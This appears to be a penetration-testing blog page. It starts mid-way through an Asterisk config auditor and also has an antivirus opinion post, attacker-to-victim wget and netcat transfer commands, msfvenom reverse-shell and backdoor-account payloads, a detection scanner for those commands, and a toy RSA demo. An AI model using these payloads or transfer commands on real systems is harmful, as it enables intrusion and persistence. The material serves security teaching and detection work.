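        if len(secret) < MIN_SECRET_LEN:
            findings.append(f"[{name}] secret is only {len(secret)} characters")
        write_privs = {p.strip() for p in acct.get("write", "").split(",")}
        if "command" in write_privs:
            findings.append(f"[{name}] write privilege includes 'command' (arbitrary CLI commands over AMI)")
    return findings


def audit_voicemail_conf(text):
    """Voicemail entries look like 'mailbox => pin,name,email,pager,options'; flag guessable PINs."""
    findings = []
    for context, items in parse_asterisk_conf(text).items():
        if context == "general":
            continue
        for mailbox, value in items:
            pin = value.split(",")[0].strip()
            if pin in WEAK_PINS or len(set(pin)) == 1 or pin == mailbox or len(pin) < 4:
                findings.append(f"[{context}] mailbox {mailbox} uses weak PIN {pin}")
    return findings


if __name__ == "__main__":
    for line in audit_manager_conf(SAMPLE_MANAGER_CONF) + audit_voicemail_conf(SAMPLE_VOICEMAIL_CONF):
        print(line)
```

The parser deliberately keeps duplicate keys and ignores `#include` lines, so on a real system you would run it over the included files as well (manager_additional.conf, manager_custom.conf) rather than only the top-level file.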

13. Listen to the voicemail to retrieve the password 'securesupport123'!
14. Mission accomplished, root dance! :-)

Are AntiVirus Software Really Necessary?

Lately, there's been talk about how AV software is becoming redundant or obsolete. Most of us accustomed to the World Wide Web will know that the Internet is a Wild Wild West, riddled with exploits especially targeted at Windows users. The proliferation of malware, ransomware and trojans contributes to sleepless nights. Then came Windows Defender, Microsoft's built-in threat protection centre for modern Windows operating systems. It offers AV protection with cloud definition updates, automatic sample submission and real-time threat protection. So why do we need AVs anymore?

Well, for starters, there are dozens of AV companies, each with its own distinct virus pattern definitions. Therefore, just because Windows Defender is able to detect a piece of malware doesn't mean the other AVs out there can, or can't. Having multiple layers of protection from different perspectives is advantageous, as it offers a more comprehensive solution. As malware changes its patterns, the definition updates of each AV company will have to adapt.

This doesn't mean you have to install 5 different AVs on your machine; it just means that you have more choices when selecting an appropriate AV software for your environment. If all AV companies went out of business, we'd have to rely solely on Windows Defender and the world would be a dangerous place! Imagine that: if MS failed to detect it, who would?!

So peeps, don't give up on using AV software; a little peace of mind goes a long way. Always practice safe browsing habits. Don't click on unknown links, especially shortened links whose origin you can't clearly make out. Most people do not comprehend the danger in clicking on unknown links. The danger lies in the code that gets executed after the click: if the user is running as a high-privilege user, the malicious code will inherit the same privilege. Also, if the host software has a vulnerability, the malicious code can take advantage of it to run arbitrary commands, such as elevating its privilege to admin or root, shutting down personal firewalls, embedding further malware, etc.

It is worth noting that cyber attacks are now targeting the client instead of the servers. Back in the day, most information was stored on servers and data was transferred to clients upon request, but with the proliferation of cloud computing, data now resides everywhere, with lots of it cached on the client machine! Most major cloud servers have default security mechanisms that make them difficult to breach, leaving the weakest link still in the human factor. It is way easier to trick a user into clicking a malicious link than to hack Amazon or Google cloud servers.

So, if you ask me, AVs are still important but are by no means the be-all and end-all solution to the problem. As AV software continues to evolve and offer threat analysis and protection, user education is still vital in ensuring data stays secure; AV software is like a babysitter, warning users of risky behaviour.

Remember, security is everyone's responsibility.


File Transfer Between Hosts

Here are some useful commands for file transfer between Linux hosts:

On Attacker host:
# python -m SimpleHTTPServer 8080

On Victim host:
# wget http://Attacker_IP_Addr:8080/Filename.php 

Another great way to transfer files between hosts is to use netcat:

On Attacker host: 
# nc -nlvp 8080 < filename.php 

On Victim host: 

# nc -w 3 Attacker_IP_Addr 8080 > filename.php 
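Whichever of the two transfers above you use, neither wget nor netcat tells you whether the file arrived intact or was swapped in flight, so it is worth carrying a hash across with it and checking it on the receiving side. The following added example (not from the original post) stands up the same kind of directory server as `python -m SimpleHTTPServer`, using Python 3's http.server bound to 127.0.0.1 on an ephemeral port, fetches the file the way wget would, and keeps it only if its SHA-256 matches the value computed on the serving side; the served file and the deliberately wrong digest are constructed for the demonstration.

```python
import functools
import hashlib
import http.server
import os
import socketserver
import tempfile
import threading
import urllib.request


def sha256_of(path):
    """Hash a file in chunks so large tool drops do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):  # silence per-request logging for the demo
        pass


def serve_directory(directory):
    """Python 3 equivalent of `python -m SimpleHTTPServer`, bound to loopback on a free port."""
    handler = functools.partial(_QuietHandler, directory=directory)
    httpd = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def fetch_and_verify(url, dest, expected_sha256):
    """Download like wget would, then keep the file only if its digest matches."""
    with urllib.request.urlopen(url, timeout=5) as resp, open(dest, "wb") as out:
        out.write(resp.read())
    if sha256_of(dest) != expected_sha256:
        os.remove(dest)  # never leave an unverified binary on disk
        return False
    return True


def demo():
    """Serve a constructed file and fetch it twice: with the right digest and with a wrong one."""
    with tempfile.TemporaryDirectory() as served, tempfile.TemporaryDirectory() as landing:
        src = os.path.join(served, "tool.sh")
        with open(src, "wb") as f:
            f.write(b"#!/bin/sh\necho 'constructed sample file'\n")
        httpd = serve_directory(served)
        try:
            url = f"http://127.0.0.1:{httpd.server_address[1]}/tool.sh"
            good = fetch_and_verify(url, os.path.join(landing, "tool.sh"), sha256_of(src))
            bad = fetch_and_verify(url, os.path.join(landing, "tool2.sh"), "0" * 64)
            leftover = sorted(os.listdir(landing))
        finally:
            httpd.shutdown()
            httpd.server_close()
    return good, bad, leftover


if __name__ == "__main__":
    print(demo())
```

In practice the digest travels out of band (printed on the serving side with `sha256sum`, checked on the receiving side with `sha256sum -c`); the in-process check here is the same comparison without the second terminal.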

For file transfer between Windows hosts, you can use meterpreter's file-transfer function, but that means you will need to upload the meterpreter shell onto the victim host first. Alternatively, run the Python SimpleHTTPServer on the attacker host and then simply use IE to download the file via HTTP, provided you have RDP on the victim.

Unfortunately, I'm not aware of any built-in command-line tool in Windows to transfer files except ftp or tftp, or writing your own PowerShell or VBScript.

Sunday, June 11, 2017

Generating Meterpreter Payload with Msfvenom

Generate a Windows reverse shell to local host 192.168.0.182 on port 443, omitting the bad chars \x00, \x0a, \x0d, with output in Python code syntax:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.182 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d" -f python

Generate a Linux reverse shell to local host 192.168.0.182 on port 443 without the bad chars \x00, \x0a, \x0d, with output in Python code syntax:

# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.182 LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d" -f python

Output:

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of python file: 1834 bytes

Based on my experience, the reverse TCP shell is not very reliable; it could be due to a bad connection, a firewall blocking it, or some mysterious reason preventing the connection from establishing. If this happens to you, I recommend generating a windows/exec payload. Example:

# msfvenom -a x86 --platform Windows -p windows/exec CMD='net user administrator qwerty /add' -f python

No encoder or badchars specified, outputting raw payload
Payload size: 219 bytes
Final size of python file: 1056 bytes

Of course, you do this only if you have the RDP protocol running on the victim server. Otherwise, adding an administrator user will be of little use.

The same can be done on a Linux host too, provided you have other means such as ssh to reach the victim; in that case you can opt for the linux/x86/exec payload:

# msfvenom -p linux/x86/exec CMD='echo hacker:pass123 | chpasswd' -f python
 
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 66 bytes
Final size of python file: 334 bytes
 
As you may have noticed, the shellcode for the exec commands is way smaller than for the reverse shell.
This is an advantage if you are writing buffer overflow exploits with limited buffer space.
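Added here as a defender-side example, not code from the original post: a small Python scanner that flags the ad hoc transfer commands from the File Transfer Between Hosts section above (SimpleHTTPServer, wget from a raw IP, netcat listeners and redirected netcat clients) and the account-manipulation commands carried by the windows/exec and linux/x86/exec payloads (net user /add, chpasswd), then correlates hosts that show both. The sample records, hostnames and the address 192.0.2.10 are constructed.

```python
import re
from typing import Dict, List

# Detection rules, one per technique shown on the page. Each pattern is applied
# to the recorded command line (Sysmon CommandLine, auditd proctitle, shell
# history or similar). Tune the raw-IP and port heuristics to your environment.
RULES = [
    # python -m SimpleHTTPServer 8080 (or the Python 3 equivalent)
    ("adhoc-http-server",
     re.compile(r"\bpython\d?(\.\d+)?\s+-m\s+(SimpleHTTPServer|http\.server)\b")),
    # nc -nlvp 8080 < file : a netcat listener (any -l style flag, or --listen)
    ("netcat-listener",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-(\w*l\w*|-listen)\b")),
    # nc -w 3 <ip> <port> > file : netcat client with shell redirection
    ("netcat-client-redirect",
     re.compile(r"\b(nc|ncat|netcat)\b\s.*\b\d{1,3}(\.\d{1,3}){3}\s+\d{1,5}\s*[<>]")),
    # wget http://<ip>:8080/file : fetch straight from a raw IP address
    ("download-from-raw-ip",
     re.compile(r"\b(wget|curl)\b.*https?://\d{1,3}(\.\d{1,3}){3}(:\d+)?/")),
    # net user administrator qwerty /add (Windows local account / group change)
    ("windows-account-add",
     re.compile(r"\bnet(\.exe)?\s+(user|localgroup)\b.*\s/add\b", re.IGNORECASE)),
    # echo user:pass | chpasswd, useradd, usermod (Linux account change)
    ("linux-account-change",
     re.compile(r"\b(chpasswd|useradd|usermod)\b")),
]

TRANSFER_RULES = {"adhoc-http-server", "netcat-listener",
                  "netcat-client-redirect", "download-from-raw-ip"}
ACCOUNT_RULES = {"windows-account-add", "linux-account-change"}

# Constructed sample process records; not from the page or any real host.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "web01", "user": "www-data", "cmd": "wget http://192.0.2.10:8080/Filename.php"},
    {"host": "web01", "user": "www-data", "cmd": "nc -w 3 192.0.2.10 8080 > filename.php"},
    {"host": "web01", "user": "root", "cmd": "sh -c 'echo hacker:pass123 | chpasswd'"},
    {"host": "ws07", "user": "CORP\\alice", "cmd": "net user administrator qwerty /add"},
    {"host": "ws07", "user": "CORP\\alice", "cmd": "curl https://www.example.com/ -o index.html"},
    {"host": "build02", "user": "jenkins", "cmd": "python -m SimpleHTTPServer 8080"},
    {"host": "build02", "user": "jenkins", "cmd": "nc -nlvp 8080 < filename.php"},
]


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per (event, matching rule) pair."""
    findings = []
    for ev in events:
        cmd = ev.get("cmd", "")
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "rule": name, "cmd": cmd})
    return findings


def correlate(findings: List[Dict[str, str]]) -> List[str]:
    """Hosts where a file transfer AND an account change were both seen: the
    combination shown on this page (drop a tool, then add a user) is a much
    stronger signal than either rule on its own."""
    seen: Dict[str, set] = {}
    for f in findings:
        seen.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in seen.items()
                  if rules & TRANSFER_RULES and rules & ACCOUNT_RULES)


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']:8} {f['user']:12} {f['rule']:24} {f['cmd']}")
    print("hosts with transfer + account change:", correlate(hits))
```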
 
 
 
 

Recon Script for Penetration Testing

Here's a short bash script I found on the web; I wrote a few extra functions to include enumeration for services such as ftp, ssh, dns, etc. This is useful for enumeration during penetration testing; many of these functions are very routine, so scripting them will definitely save you time. Credits to the original author.

Public Key vs Private Key

Now, I know there is lots of information on PKI out there, but for heaven's sake, I still see infosec peeps who can't tell the difference between a public and a private key! #facepalm. I have even seen questions and answers in a well-known InfoSec certification course get it mixed up!

So for heaven's sake, pleaseeeeee... let it be known: the public key is used for encryption and the private key is used for decryption. It is easy to remember, simply because you give out your public key to people so they can use it to send you encrypted content that only YOU can decrypt!

With that in mind, please keep your private key private. :-p
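To make the roles concrete, here is a toy RSA implementation, an added example that is not code from the original post. It uses two well-known Mersenne primes for readability and has no padding, so it illustrates the key roles only; it also goes one step beyond the post by showing the complementary case, where the private key signs and the public key verifies.

```python
"""Toy RSA: the PUBLIC key encrypts, the PRIVATE key decrypts. Illustration only."""
import hashlib
from math import gcd

# Two well-known Mersenne primes (2^31 - 1 and 2^61 - 1). Real keys use random
# primes hundreds of digits long; these small ones are for readability only.
P = 2**31 - 1
Q = 2**61 - 1


def _modinv(a: int, m: int) -> int:
    """Modular inverse of a mod m via the extended Euclidean algorithm."""
    r0, r1, s0, s1 = m, a % m, 0, 1
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        s0, s1 = s1, s0 - q * s1
    if r0 != 1:
        raise ValueError("not invertible")
    return s0 % m


def keygen(p: int, q: int, e: int = 65537):
    """Return (public_key, private_key) as (e, n) and (d, n)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime with phi(n)")
    return (e, n), (_modinv(e, phi), n)


def _to_int(data: bytes, n: int) -> int:
    m = int.from_bytes(data, "big")
    if m >= n:
        raise ValueError("message too large for this toy modulus")
    return m


def encrypt(public_key, plaintext: bytes) -> int:
    """Anyone holding the PUBLIC key can do this."""
    e, n = public_key
    return pow(_to_int(plaintext, n), e, n)


def decrypt(private_key, ciphertext: int) -> bytes:
    """Only the holder of the PRIVATE key can do this.
    (Toy: leading zero bytes of the plaintext are not preserved.)"""
    d, n = private_key
    m = pow(ciphertext, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def public_key_cannot_decrypt(public_key, plaintext: bytes) -> bool:
    """Applying the public exponent to a ciphertext does not recover the
    message: this is why handing out the public key is safe."""
    e, n = public_key
    c = encrypt(public_key, plaintext)
    return pow(c, e, n) != _to_int(plaintext, n)


def sign(private_key, message: bytes) -> int:
    """The complementary case: the PRIVATE key signs (raw RSA over a SHA-256
    digest, no padding, so again illustration only)."""
    d, n = private_key
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(h, d, n)


def verify(public_key, message: bytes, signature: int) -> bool:
    """...and anyone with the PUBLIC key can verify the signature."""
    e, n = public_key
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == h


if __name__ == "__main__":
    public, private = keygen(P, Q)
    c = encrypt(public, b"meet at 9")
    print("ciphertext:", c)
    print("decrypted :", decrypt(private, c))
    print("public key can decrypt?", not public_key_cannot_decrypt(public, b"meet at 9"))
    s = sign(private, b"release v1.2")
    print("signature verifies:", verify(public, b"release v1.2", s))
```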

